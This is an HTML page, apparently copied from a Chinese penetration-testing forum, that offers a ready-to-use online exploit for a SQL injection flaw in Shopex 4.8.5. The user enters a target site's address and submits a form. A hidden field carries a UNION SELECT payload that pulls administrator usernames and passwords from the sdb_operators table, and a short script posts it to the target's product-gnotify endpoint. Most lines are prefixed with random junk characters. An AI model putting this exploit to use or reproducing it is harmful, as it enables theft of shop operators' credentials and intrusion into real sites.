<center>
* ?4 Q" j! r% x: K( ~<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
# b- o+ T& a0 }9 }9 ^: r<form action="" method="post" name="submit_url">
2 V6 O) s. y/ u- s, N网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>! V" V9 X# x. t: h
<input type="hidden" name="goods[goods_id]" value="3">
/ x, ?# O" u* k; p<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
- m( [& D$ {; [; T. @; K: Y Z<input type="submit" value="给我注入" onclick=fsubmit()>0 G, A2 i. f( T, f
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
; W% S0 u* Q/ s5 C2 V, p n
2 `$ E0 z6 g) l- {<script>
& y1 F5 X1 D6 \% Y' ^. d Ufunction fsubmit(){
2 z& S6 _2 {% t8 z; I- ?) @: Lform = document.forms[0];
& l) M& q& k$ z/ s* Pform.action = form.url.value+'/?product-gnotify';
( f' Z& ?$ v* j6 _) U, Jform.submit(); 1 A; k9 ?1 w) a$ W( t# w( J
}
: A% u% m c* ^9 `. U# c) l" e</script>
: P9 }2 G2 z% ~% i! o4 j+ J |